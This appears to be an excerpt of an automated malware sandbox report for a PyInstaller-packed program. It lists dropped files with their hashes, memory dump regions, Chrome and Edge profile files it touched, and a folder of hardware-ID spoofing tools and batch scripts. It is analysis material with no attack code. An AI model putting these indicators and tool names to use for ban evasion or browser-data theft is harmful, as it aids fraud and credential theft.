| SHA512 | 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2 |
memory/3652-1644-0x00007FFC903A0000-0x00007FFC90988000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI15962\base_library.zip
| MD5 | 481da210e644d6b317cafb5ddf09e1a5 |
| SHA1 | 00fe8e1656e065d5cf897986c12ffb683f3a2422 |
| SHA256 | 3242ea7a6c4c712f10108a619bf5213878146547838f7e2c1e80d2778eb0aaa0 |
| SHA512 | 74d177794f0d7e67f64a4f0c9da4c3fd25a4d90eb909e942e42e5651cc1930b8a99eef6d40107aa8756e75ffbcc93284b916862e24262df897aaac97c5072210 |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\python3.DLL
| MD5 | 34e49bb1dfddf6037f0001d9aefe7d61 |
| SHA1 | a25a39dca11cdc195c9ecd49e95657a3e4fe3215 |
| SHA256 | 4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281 |
| SHA512 | edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856 |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\libffi-8.dll
| MD5 | 77199701fe2d585080e44c70ea5aed4c |
| SHA1 | 34c8b0ce03a945351e30fb704a00d5257e2a6132 |
| SHA256 | 4eb41bcf5e54017c4d8c6a7184f4633d9e6c10ca8f52ad21e3b752edd745d4ee |
| SHA512 | d325f517a3eb831f3f5853c5471295244716a666507aa4e4b262e0842f1bfad0c9648a6711fbce514193e411cfcdbb9afe86764e740355cd06895dfcc623fe34 |
memory/3652-1654-0x00007FFCA4E20000-0x00007FFCA4E2F000-memory.dmp
memory/3652-1653-0x00007FFC9F3C0000-0x00007FFC9F3E4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI15962\_ctypes.pyd
| MD5 | e7ec734581f37a065e54b55515222897 |
| SHA1 | 9205e3030ea43027cba202b4c968447927d3dc0d |
| SHA256 | 9e619adf436228c1c87e7909ca58575a02ef069d71045785b102e2a0f833b6a3 |
| SHA512 | 281a16075a10ab4465ff1ab49c5639e982961b5029dc36f4b9657f32b9c29ff1bd39c2d6a3f793d7f93fd10802f5d1356bee9e54fa6eb67780a6275094e4fef3 |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\_bz2.pyd
| MD5 | c33370fc6631725aec3102b955b5e4bf |
| SHA1 | 0fce43642e54cd9db1eb48bbfd7661b8a4613e0d |
| SHA256 | 6c41a618b4dec812f5cd434375f33052daada9f49c6d472e82bdec27c407cfc5 |
| SHA512 | 1de939ccb2b6349eaefcf12f37fb00b2b5dafff07930d52bfededcdfe6a234c0da75030596f544adfea09c786dc576fc5a88056ec614d2059a1a9e182925a021 |
memory/3652-1686-0x00007FFC9F270000-0x00007FFC9F29D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-crt-conio-l1-1-0.dll
| MD5 | d4fba5a92d68916ec17104e09d1d9d12 |
| SHA1 | 247dbc625b72ffb0bf546b17fb4de10cad38d495 |
| SHA256 | 93619259328a264287aee7c5b88f7f0ee32425d7323ce5dc5a2ef4fe3bed90d5 |
| SHA512 | d5a535f881c09f37e0adf3b58d41e123f527d081a1ebecd9a927664582ae268341771728dc967c30908e502b49f6f853eeaebb56580b947a629edc6bce2340d8 |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-util-l1-1-0.dll
| MD5 | 0f129611a4f1e7752f3671c9aa6ea736 |
| SHA1 | 40c07a94045b17dae8a02c1d2b49301fad231152 |
| SHA256 | 2e1f090aba941b9d2d503e4cd735c958df7bb68f1e9bdc3f47692e1571aaac2f |
| SHA512 | 6abc0f4878bb302713755a188f662c6fe162ea6267e5e1c497c9ba9fddbdaea4db050e322cb1c77d6638ecf1dad940b9ebc92c43acaa594040ee58d313cbcfae |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | d12403ee11359259ba2b0706e5e5111c |
| SHA1 | 03cc7827a30fd1dee38665c0cc993b4b533ac138 |
| SHA256 | f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781 |
| SHA512 | 9004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0 |
memory/3652-1682-0x00007FFCA0BB0000-0x00007FFCA0BC9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-sysinfo-l1-1-0.dll
| MD5 | fd46c3f6361e79b8616f56b22d935a53 |
| SHA1 | 107f488ad966633579d8ec5eb1919541f07532ce |
| SHA256 | 0dc92e8830bc84337dcae19ef03a84ef5279cf7d4fdc2442c1bc25320369f9df |
| SHA512 | 3360b2e2a25d545ccd969f305c4668c6cda443bbdbd8a8356ffe9fbc2f70d90cf4540f2f28c9ed3eea6c9074f94e69746e7705e6254827e6a4f158a75d81065b |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-synch-l1-2-0.dll
| MD5 | 1281e9d1750431d2fe3b480a8175d45c |
| SHA1 | bc982d1c750b88dcb4410739e057a86ff02d07ef |
| SHA256 | 433bd8ddc4f79aee65ca94a54286d75e7d92b019853a883e51c2b938d2469baa |
| SHA512 | a954e6ce76f1375a8beac51d751b575bbc0b0b8ba6aa793402b26404e45718165199c2c00ccbcba3783c16bdd96f0b2c17addcc619c39c8031becebef428ce77 |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-synch-l1-1-0.dll
| MD5 | 225d9f80f669ce452ca35e47af94893f |
| SHA1 | 37bd0ffc8e820247bd4db1c36c3b9f9f686bbd50 |
| SHA256 | 61c0ebe60ce6ebabcb927ddff837a9bf17e14cd4b4c762ab709e630576ec7232 |
| SHA512 | 2f71a3471a9868f4d026c01e4258aff7192872590f5e5c66aabd3c088644d28629ba8835f3a4a23825631004b1afd440efe7161bb9fc7d7c69e0ee204813ca7b |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-string-l1-1-0.dll
| MD5 | 2666581584ba60d48716420a6080abda |
| SHA1 | c103f0ea32ebbc50f4c494bce7595f2b721cb5ad |
| SHA256 | 27e9d3e7c8756e4512932d674a738bf4c2969f834d65b2b79c342a22f662f328 |
| SHA512 | befed15f11a0550d2859094cc15526b791dadea12c2e7ceb35916983fb7a100d89d638fb1704975464302fae1e1a37f36e01e4bef5bc4924ab8f3fd41e60bd0c |
memory/3652-1692-0x00007FFC8FF60000-0x00007FFC90018000-memory.dmp
memory/3652-1691-0x00007FFC9E5A0000-0x00007FFC9E5CE000-memory.dmp
memory/3652-1690-0x00007FFCA4CB0000-0x00007FFCA4CBD000-memory.dmp
memory/3652-1689-0x00007FFC9FD70000-0x00007FFC9FD89000-memory.dmp
memory/3652-1688-0x00007FFC90020000-0x00007FFC90395000-memory.dmp
memory/3652-1687-0x00007FFC9FFA0000-0x00007FFC9FFB4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-rtlsupport-l1-1-0.dll
| MD5 | a0c2dbe0f5e18d1add0d1ba22580893b |
| SHA1 | 29624df37151905467a223486500ed75617a1dfd |
| SHA256 | 3c29730df2b28985a30d9c82092a1faa0ceb7ffc1bd857d1ef6324cf5524802f |
| SHA512 | 3e627f111196009380d1687e024e6ffb1c0dcf4dcb27f8940f17fec7efdd8152ff365b43cb7fdb31de300955d6c15e40a2c8fb6650a91706d7ea1c5d89319b12 |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-profile-l1-1-0.dll
| MD5 | f3ff2d544f5cd9e66bfb8d170b661673 |
| SHA1 | 9e18107cfcd89f1bbb7fdaf65234c1dc8e614add |
| SHA256 | e1c5d8984a674925fa4afbfe58228be5323fe5123abcd17ec4160295875a625f |
| SHA512 | 184b09c77d079127580ef80eb34bded0f5e874cefbe1c5f851d86861e38967b995d859e8491fcc87508930dc06c6bbf02b649b3b489a1b138c51a7d4b4e7aaad |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | 517eb9e2cb671ae49f99173d7f7ce43f |
| SHA1 | 4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab |
| SHA256 | 57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54 |
| SHA512 | 492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-processthreads-l1-1-0.dll
| MD5 | c3632083b312c184cbdd96551fed5519 |
| SHA1 | a93e8e0af42a144009727d2decb337f963a9312e |
| SHA256 | be8d78978d81555554786e08ce474f6af1de96fcb7fa2f1ce4052bc80c6b2125 |
| SHA512 | 8807c2444a044a3c02ef98cf56013285f07c4a1f7014200a21e20fcb995178ba835c30ac3889311e66bc61641d6226b1ff96331b019c83b6fcc7c87870cce8c4 |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-processenvironment-l1-1-0.dll
| MD5 | 0462e22f779295446cd0b63e61142ca5 |
| SHA1 | 616a325cd5b0971821571b880907ce1b181126ae |
| SHA256 | 0b6b598ec28a9e3d646f2bb37e1a57a3dda069a55fba86333727719585b1886e |
| SHA512 | 07b34dca6b3078f7d1e8ede5c639f697c71210dcf9f05212fd16eb181ab4ac62286bc4a7ce0d84832c17f5916d0224d1e8aab210ceeff811fc6724c8845a74fe |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-namedpipe-l1-1-0.dll
| MD5 | 321a3ca50e80795018d55a19bf799197 |
| SHA1 | df2d3c95fb4cbb298d255d342f204121d9d7ef7f |
| SHA256 | 5476db3a4fecf532f96d48f9802c966fdef98ec8d89978a79540cb4db352c15f |
| SHA512 | 3ec20e1ac39a98cb5f726d8390c2ee3cd4cd0bf118fdda7271f7604a4946d78778713b675d19dd3e1ec1d6d4d097abe9cd6d0f76b3a7dff53ce8d6dbc146870a |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-memory-l1-1-0.dll
| MD5 | 3c38aac78b7ce7f94f4916372800e242 |
| SHA1 | c793186bcf8fdb55a1b74568102b4e073f6971d6 |
| SHA256 | 3f81a149ba3862776af307d5c7feef978f258196f0a1bf909da2d3f440ff954d |
| SHA512 | c2746aa4342c6afffbd174819440e1bbf4371a7fed29738801c75b49e2f4f94fd6d013e002bad2aadafbc477171b8332c8c5579d624684ef1afbfde9384b8588 |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-localization-l1-2-0.dll
| MD5 | 724223109e49cb01d61d63a8be926b8f |
| SHA1 | 072a4d01e01dbbab7281d9bd3add76f9a3c8b23b |
| SHA256 | 4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210 |
| SHA512 | 19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-libraryloader-l1-1-0.dll
| MD5 | 1f2a00e72bc8fa2bd887bdb651ed6de5 |
| SHA1 | 04d92e41ce002251cc09c297cf2b38c4263709ea |
| SHA256 | 9c8a08a7d40b6f697a21054770f1afa9ffb197f90ef1eee77c67751df28b7142 |
| SHA512 | 8cf72df019f9fc9cd22ff77c37a563652becee0708ff5c6f1da87317f41037909e64dcbdcc43e890c5777e6bcfa4035a27afc1aeeb0f5deba878e3e9aef7b02a |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-interlocked-l1-1-0.dll
| MD5 | c6024cc04201312f7688a021d25b056d |
| SHA1 | 48a1d01ae8bc90f889fb5f09c0d2a0602ee4b0fd |
| SHA256 | 8751d30df554af08ef42d2faa0a71abcf8c7d17ce9e9ff2ea68a4662603ec500 |
| SHA512 | d86c773416b332945acbb95cbe90e16730ef8e16b7f3ccd459d7131485760c2f07e95951aeb47c1cf29de76affeb1c21bdf6d8260845e32205fe8411ed5efa47 |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-heap-l1-1-0.dll
| MD5 | accc640d1b06fb8552fe02f823126ff5 |
| SHA1 | 82ccc763d62660bfa8b8a09e566120d469f6ab67 |
| SHA256 | 332ba469ae84aa72ec8cce2b33781db1ab81a42ece5863f7a3cb5a990059594f |
| SHA512 | 6382302fb7158fc9f2be790811e5c459c5c441f8caee63df1e09b203b8077a27e023c4c01957b252ac8ac288f8310bcee5b4dcc1f7fc691458b90cdfaa36dcbe |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-handle-l1-1-0.dll
| MD5 | e89cdcd4d95cda04e4abba8193a5b492 |
| SHA1 | 5c0aee81f32d7f9ec9f0650239ee58880c9b0337 |
| SHA256 | 1a489e0606484bd71a0d9cb37a1dc6ca8437777b3d67bfc8c0075d0cc59e6238 |
| SHA512 | 55d01e68c8c899e99a3c62c2c36d6bcb1a66ff6ecd2636d2d0157409a1f53a84ce5d6f0c703d5ed47f8e9e2d1c9d2d87cc52585ee624a23d92183062c999b97e |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-file-l2-1-0.dll
| MD5 | bfffa7117fd9b1622c66d949bac3f1d7 |
| SHA1 | 402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2 |
| SHA256 | 1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e |
| SHA512 | b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-file-l1-2-0.dll
| MD5 | 1c58526d681efe507deb8f1935c75487 |
| SHA1 | 0e6d328faf3563f2aae029bc5f2272fb7a742672 |
| SHA256 | ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2 |
| SHA512 | 8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1 |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-file-l1-1-0.dll
| MD5 | efad0ee0136532e8e8402770a64c71f9 |
| SHA1 | cda3774fe9781400792d8605869f4e6b08153e55 |
| SHA256 | 3d2c55902385381869db850b526261ddeb4628b83e690a32b67d2e0936b2c6ed |
| SHA512 | 69d25edf0f4c8ac5d77cb5815dfb53eac7f403dc8d11bfe336a545c19a19ffde1031fa59019507d119e4570da0d79b95351eac697f46024b4e558a0ff6349852 |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-errorhandling-l1-1-0.dll
| MD5 | eb0978a9213e7f6fdd63b2967f02d999 |
| SHA1 | 9833f4134f7ac4766991c918aece900acfbf969f |
| SHA256 | ab25a1fe836fc68bcb199f1fe565c27d26af0c390a38da158e0d8815efe1103e |
| SHA512 | 6f268148f959693ee213db7d3db136b8e3ad1f80267d8cbd7d5429c021adaccc9c14424c09d527e181b9c9b5ea41765aff568b9630e4eb83bfc532e56dfe5b63 |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-debug-l1-1-0.dll
| MD5 | 33bbece432f8da57f17bf2e396ebaa58 |
| SHA1 | 890df2dddfdf3eeccc698312d32407f3e2ec7eb1 |
| SHA256 | 7cf0944901f7f7e0d0b9ad62753fc2fe380461b1cce8cdc7e9c9867c980e3b0e |
| SHA512 | 619b684e83546d97fc1d1bc7181ad09c083e880629726ee3af138a9e4791a6dcf675a8df65dc20edbe6465b5f4eac92a64265df37e53a5f34f6be93a5c2a7ae5 |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-datetime-l1-1-0.dll
| MD5 | cfe0c1dfde224ea5fed9bd5ff778a6e0 |
| SHA1 | 5150e7edd1293e29d2e4d6bb68067374b8a07ce6 |
| SHA256 | 0d0f80cbf476af5b1c9fd3775e086ed0dfdb510cd0cc208ec1ccb04572396e3e |
| SHA512 | b0e02e1f19cfa7de3693d4d63e404bdb9d15527ac85a6d492db1128bb695bffd11bec33d32f317a7615cb9a820cd14f9f8b182469d65af2430ffcdbad4bd7000 |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\api-ms-win-core-console-l1-1-0.dll
| MD5 | e8b9d74bfd1f6d1cc1d99b24f44da796 |
| SHA1 | a312cfc6a7ed7bf1b786e5b3fd842a7eeb683452 |
| SHA256 | b1b3fd40ab437a43c8db4994ccffc7f88000cc8bb6e34a2bcbff8e2464930c59 |
| SHA512 | b74d9b12b69db81a96fc5a001fd88c1e62ee8299ba435e242c5cb2ce446740ed3d8a623e1924c2bc07bfd9aef7b2577c9ec8264e53e5be625f4379119bafcc27 |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\_lzma.pyd
| MD5 | 49a6a6127ad0a70a2d60f193254ba710 |
| SHA1 | eb9f1f5a0b264d6c2c477562b9331a798b9a1909 |
| SHA256 | 4ad51dac78f9192831ee9c6959ad3d67e0f66869bded3a91688b08c4ff2103f7 |
| SHA512 | e5064d0536361fd193b1855fcb4173cace51094d8c8827dfca893d49734200156847987124ded14d75aa0c61f1204cc00eaf4ee81d84406e17ad216bf17003ca |
memory/3652-1695-0x00007FFC9DCB0000-0x00007FFC9DCD6000-memory.dmp
memory/3652-1694-0x00007FFCA29B0000-0x00007FFCA29BB000-memory.dmp
memory/3652-1693-0x00007FFCA4A80000-0x00007FFCA4A8D000-memory.dmp
memory/3652-1696-0x00007FFC8FE40000-0x00007FFC8FF5C000-memory.dmp
memory/3652-1697-0x00007FFC96C80000-0x00007FFC96CB8000-memory.dmp
memory/3652-1708-0x00007FFC9F560000-0x00007FFC9F56E000-memory.dmp
memory/3652-1707-0x00007FFC9F3C0000-0x00007FFC9F3E4000-memory.dmp
memory/3652-1717-0x00007FFC9B8F0000-0x00007FFC9B8FC000-memory.dmp
memory/3652-1716-0x00007FFC9F250000-0x00007FFC9F25B000-memory.dmp
memory/3652-1715-0x00007FFC9F260000-0x00007FFC9F26C000-memory.dmp
memory/3652-1714-0x00007FFC9B330000-0x00007FFC9B342000-memory.dmp
memory/3652-1713-0x00007FFC9B900000-0x00007FFC9B90D000-memory.dmp
memory/3652-1712-0x00007FFC9B910000-0x00007FFC9B91C000-memory.dmp
memory/3652-1711-0x00007FFC9E580000-0x00007FFC9E58C000-memory.dmp
memory/3652-1710-0x00007FFC9E590000-0x00007FFC9E59B000-memory.dmp
memory/3652-1709-0x00007FFC90020000-0x00007FFC90395000-memory.dmp
memory/3652-1706-0x00007FFCA08E0000-0x00007FFCA08EB000-memory.dmp
memory/3652-1705-0x00007FFC9FA00000-0x00007FFC9FA0C000-memory.dmp
memory/3652-1704-0x00007FFC9FA10000-0x00007FFC9FA1C000-memory.dmp
memory/3652-1703-0x00007FFC9FB50000-0x00007FFC9FB5B000-memory.dmp
memory/3652-1702-0x00007FFC9FB60000-0x00007FFC9FB6C000-memory.dmp
memory/3652-1701-0x00007FFCA1F80000-0x00007FFCA1F8C000-memory.dmp
memory/3652-1700-0x00007FFC903A0000-0x00007FFC90988000-memory.dmp
memory/3652-1699-0x00007FFCA2160000-0x00007FFCA216B000-memory.dmp
memory/3652-1698-0x00007FFCA28F0000-0x00007FFCA28FB000-memory.dmp
memory/3652-1722-0x00007FFC911C0000-0x00007FFC911E2000-memory.dmp
memory/3652-1727-0x00007FFC90F00000-0x00007FFC90F4D000-memory.dmp
memory/3652-1726-0x00007FFC90F50000-0x00007FFC90F69000-memory.dmp
memory/3652-1725-0x00007FFC90F70000-0x00007FFC90F87000-memory.dmp
memory/3652-1724-0x00007FFC8FE40000-0x00007FFC8FF5C000-memory.dmp
memory/3652-1723-0x00007FFC9DCB0000-0x00007FFC9DCD6000-memory.dmp
memory/3652-1721-0x00007FFC911F0000-0x00007FFC91204000-memory.dmp
memory/3652-1720-0x00007FFC8FF60000-0x00007FFC90018000-memory.dmp
memory/3652-1719-0x00007FFC96C40000-0x00007FFC96C52000-memory.dmp
memory/3652-1718-0x00007FFC96C60000-0x00007FFC96C75000-memory.dmp
memory/3652-1730-0x00007FFC96C80000-0x00007FFC96CB8000-memory.dmp
memory/3652-1729-0x00007FFC9B320000-0x00007FFC9B32A000-memory.dmp
memory/3652-1731-0x00007FFC8FE00000-0x00007FFC8FE1E000-memory.dmp
memory/3652-1728-0x00007FFC8FE20000-0x00007FFC8FE31000-memory.dmp
memory/3652-1732-0x00007FFC8FDA0000-0x00007FFC8FDFD000-memory.dmp
memory/3652-1733-0x00007FFC8FD70000-0x00007FFC8FD99000-memory.dmp
memory/3652-1734-0x00007FFC8FD40000-0x00007FFC8FD6E000-memory.dmp
memory/3652-1736-0x00007FFC8FB90000-0x00007FFC8FD03000-memory.dmp
memory/3652-1735-0x00007FFC8FD10000-0x00007FFC8FD33000-memory.dmp
memory/3652-1737-0x00007FFC8FB70000-0x00007FFC8FB88000-memory.dmp
memory/3652-1749-0x00007FFC8FAE0000-0x00007FFC8FAEB000-memory.dmp
memory/3652-1748-0x00007FFC8FAF0000-0x00007FFC8FAFC000-memory.dmp
memory/3652-1747-0x00007FFC8FB00000-0x00007FFC8FB0E000-memory.dmp
memory/3652-1746-0x00007FFC911C0000-0x00007FFC911E2000-memory.dmp
memory/3652-1745-0x00007FFC8FB10000-0x00007FFC8FB1C000-memory.dmp
memory/3652-1744-0x00007FFC8FB20000-0x00007FFC8FB2C000-memory.dmp
memory/3652-1743-0x00007FFC8FB30000-0x00007FFC8FB3B000-memory.dmp
memory/3652-1742-0x00007FFC8FB40000-0x00007FFC8FB4C000-memory.dmp
memory/3652-1741-0x00007FFC8FB50000-0x00007FFC8FB5B000-memory.dmp
memory/3652-1740-0x00007FFC8FB60000-0x00007FFC8FB6C000-memory.dmp
memory/3652-1753-0x00007FFC8FAC0000-0x00007FFC8FACC000-memory.dmp
memory/3652-1752-0x00007FFC8FAD0000-0x00007FFC8FADB000-memory.dmp
memory/3652-1751-0x00007FFC90F00000-0x00007FFC90F4D000-memory.dmp
memory/3652-1750-0x00007FFC90F70000-0x00007FFC90F87000-memory.dmp
memory/3652-1739-0x00007FFC90EF0000-0x00007FFC90EFB000-memory.dmp
memory/3652-1738-0x00007FFC96590000-0x00007FFC9659B000-memory.dmp
memory/3652-1755-0x00007FFC8FAA0000-0x00007FFC8FAAD000-memory.dmp
memory/3652-1754-0x00007FFC8FAB0000-0x00007FFC8FABC000-memory.dmp
memory/3652-1757-0x00007FFC8FA70000-0x00007FFC8FA7C000-memory.dmp
memory/3652-1756-0x00007FFC8FA80000-0x00007FFC8FA92000-memory.dmp
memory/3652-1758-0x00007FFC8FDA0000-0x00007FFC8FDFD000-memory.dmp
memory/3652-1761-0x00007FFC8FA30000-0x00007FFC8FA65000-memory.dmp
memory/3652-1760-0x00007FFC8FD40000-0x00007FFC8FD6E000-memory.dmp
memory/3652-1759-0x00007FFC8FD70000-0x00007FFC8FD99000-memory.dmp
memory/3652-1762-0x00007FFC8F970000-0x00007FFC8FA2C000-memory.dmp
memory/3652-1764-0x00007FFC8FB90000-0x00007FFC8FD03000-memory.dmp
memory/3652-1765-0x00007FFC8F940000-0x00007FFC8F96B000-memory.dmp
memory/3652-1763-0x00007FFC8FD10000-0x00007FFC8FD33000-memory.dmp
memory/3652-1766-0x00007FFC8F660000-0x00007FFC8F93F000-memory.dmp
memory/3652-1767-0x00007FFC8B8D0000-0x00007FFC8D9C3000-memory.dmp
memory/3652-1769-0x00007FFC8F630000-0x00007FFC8F651000-memory.dmp
memory/3652-1768-0x00007FFCA49C0000-0x00007FFCA49D7000-memory.dmp
memory/3652-1770-0x00007FFC8F600000-0x00007FFC8F622000-memory.dmp
memory/3652-1771-0x00007FFC8F560000-0x00007FFC8F5FC000-memory.dmp
memory/3652-1777-0x00007FFCA49A0000-0x00007FFCA49BA000-memory.dmp
memory/3652-1776-0x00007FFC8F530000-0x00007FFC8F560000-memory.dmp
memory/3652-1775-0x00007FFC8F380000-0x00007FFC8F434000-memory.dmp
memory/3652-1774-0x00007FFC8F460000-0x00007FFC8F47D000-memory.dmp
memory/3652-1773-0x00007FFC8F4A0000-0x00007FFC8F4E7000-memory.dmp
memory/3652-1772-0x00007FFC8F4F0000-0x00007FFC8F523000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_idp0445i.xfy.ps1
C:\Users\Admin\AppData\Local\Temp\_MEI47562\cryptography-42.0.8.dist-info\INSTALLER
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000024
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\3a9dcb0f-1bd4-4bcb-8923-d7553a8fa0c9.tmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\12e70412-6fcc-4056-90c2-bb834d0a4c9a.tmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\d24d6b52-2425-4bf2-8b5d-dd34cd55a658.tmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\Downloads\Unconfirmed 586836.crdownload
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe59ace0.TMP
C:\Users\Admin\Desktop\New folder\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_F24AE254AC712022CD7275ECC89876F9
C:\Users\Admin\Desktop\New folder\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_F24AE254AC712022CD7275ECC89876F9
C:\Users\Admin\Desktop\New folder\AMIDEWINx64.EXE
C:\Users\Admin\Desktop\New folder\AMIFLDRV64.SYS
C:\Windows\backgroundcleaner.bat
C:\Users\Admin\Desktop\New folder\devcon.exe
C:\Users\Admin\Desktop\New folder\DeviceCleanupCmd.exe
C:\Users\Admin\Desktop\New folder\DevManView.exe
C:\Users\Admin\Desktop\New folder\DriveCleanup.exe
C:\Users\Admin\Desktop\New folder\gen.py
C:\Users\Admin\Desktop\New folder\kreyzecleaner.exe
C:\Users\Admin\Desktop\New folder\python310._pth
C:\Users\Admin\Desktop\New folder\segwindrv.cat
C:\Users\Admin\Desktop\New folder\segwindrvx64.sys
C:\Users\Admin\Desktop\New folder\serials.bat
C:\Users\Admin\Desktop\New folder\sidchg64-3.0h.exe
C:\Users\Admin\Desktop\New folder\Spoofer.bat
C:\Users\Admin\Desktop\New folder\Taskkill_clean.bat
C:\Users\Admin\Desktop\New folder\Volumeid64.exe
C:\Users\Admin\Desktop\New folder\CrashpadMetrics-active.pma
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
C:\Users\Admin\Desktop\New folder\BrowserMetrics-668C2124-1988.pma
C:\Users\Admin\Desktop\New folder\LOG
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
C:\Users\Admin\Desktop\New folder\LOG
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\Desktop\New folder\History Provider Cache
C:\Users\Admin\Desktop\New folder\LOG
C:\Users\Admin\Desktop\New folder\f_000023
C:\Users\Admin\Desktop\New folder\f_000024
C:\Users\Admin\Desktop\New folder\f_000025
C:\Users\Admin\Desktop\New folder\f_000027
C:\Users\Admin\Desktop\New folder\f_000029
C:\Users\Admin\Desktop\New folder\f_000028
C:\Users\Admin\Desktop\New folder\f_000026
C:\Users\Admin\Desktop\New folder\f_00002a
C:\Users\Admin\Desktop\New folder\MANIFEST-000004
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
